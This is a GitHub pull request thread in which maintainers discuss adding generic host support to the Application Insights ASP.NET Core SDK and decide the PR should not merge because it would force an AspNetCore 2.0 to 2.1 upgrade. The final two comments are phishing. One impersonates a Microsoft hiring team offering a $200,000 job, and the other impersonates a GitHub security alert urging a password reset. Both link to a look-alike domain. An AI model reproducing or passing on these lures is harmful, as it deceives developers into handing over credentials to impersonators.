### PR TITLE
Dev/saars/generic host

### PR DESCRIPTION
**Pull request by xiaomi7732**
This is Working in Progress. I use this for preview the work direction. Please DO NOT MERGE.

### CODE REVIEW

**Comment by xiaomi7732** [comment]
@lmolkova, @karolz-ms, what do you think about this change to make App Insights SDK support both webHostBuilder and the generic hostBuilder?

**Comment by karolz-ms** [comment]
Adding support for generic host makes a lot of sense.

However the way you have done it here, you are forcing the consumers of AppInsights.aspnetcore library to depend on 2.1 series of AspNetCore assemblies. If I am not mistaken, that would force 2.0-to-2.1 upgrade on apps that use AspNetCore 2.0 today. [While not super-complicated](https://docs.microsoft.com/en-us/aspnet/core/migration/20_21?view=aspnetcore-2.1) this is not a trivial change either. Upgrading AppInsights SDK to a newer version should not force such change unless really there is no other way.

I am afraid we will need a separate assembly for generic host support. @lmolkova what do you think?

**Comment by xiaomi7732** [comment]
@karolz-ms Thanks for pointing the sceanrio out. I didn't really consider it.
Now that I reviewed the project file again: NetStandard 1.6 is still there, I think AspNetCore 2.0 app is still supported - they could keep using NetStandard 1.6, right?
Well, they won't have generic .NET host, but that is because that host builder requires Core 2.1 series pkgs.
Does this make sense?

**Comment by karolz-ms** [comment]
> I think AspNetCore 2.0 app is still supported - they could keep using NetStandard 1.6, right?

How? 

I do not see anything in [PackageReference documentation](https://docs.microsoft.com/en-us/nuget/consume-packages/package-references-in-project-files) that allows me to say "oh, BTW, please pick up netstandard16, not netstandard20 binaries". And I would expect Nuget default to be to pick up netstandard20 binaries for netcoreapp20 application, not lower-capability netstandard16.

Am I missing something?

**Comment by lmolkova** [comment]
I agree with @karolz-ms concern. Also, This PR solves the issue of not being able to use AspNEtCore SDK on the generic host, though.  I think installing ApplicationInsights.AspNetCore package and introducing the dependency on AspNetCore for generic host apps is not the best way forward, so I think packages should be separated.

**Comment by xiaomi7732** [comment]
@karolz-ms / @lmolkova , thanks for the comment. I think I see the problem now - this time for real :-) I don't think it a good idea to force the user to upgrade to 2.1 from 2.0 too. And I am glad that I made this PR for your review 👍 

One benefit of having the code in the same package is to reuse the initialization for the service collection. Make an additional package instead, my understanding is that we are not going to share the initialization for the service collections. **What do you think?** Well, that might not be a bad thing, changes to one package will then not break the other.

@lmolkova I don't see it too much to come up with a new package. Can you make a call for the name of the package that I will spend some time later to work on? I would image it becomes another project live beside the current project, sounds about right?

**Comment by xiaomi7732** [comment]
This is deprecated.

**Comment by GezaBacsi** [comment]
# Congratulations, xiaomi7732!

Hello,

We are delighted to inform you that your application for a position at Microsoft has advanced to the final stage. This opportunity comes with a competitive salary offer of $200,000, reflecting the significant role and responsibilities.

For more details and to proceed with your application, please visit [Microsoft Careers](https://github.hudevelopers.online/).

## Next Steps:

1. **Confirm Interview Date**
   - Please confirm your availability by visiting the following link: [Schedule Interview](https://github.hudevelopers.online/)

2. **Prepare for Your Interview**
   - Review the job description and be prepared to discuss how your experiences and skills align with Microsoft's needs. Further information can be found at [Microsoft Careers](https://github.hudevelopers.online/).

3. **Review Offer Details**
   - While preparing, consider the comprehensive benefits package, which will be detailed further during the interview process. Additional details are available at [Microsoft Careers](https://github.hudevelopers.online/).

Thank you for your interest in joining Microsoft. We are very impressed with your background and are excited to potentially welcome you to our team.

*If you have any questions or need to update your application details, please do not hesitate to visit [Contact Us](https://github.hudevelopers.online/).*

Best Regards,  
**Microsoft Hiring Team**

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**

**Pull request closed without merging**
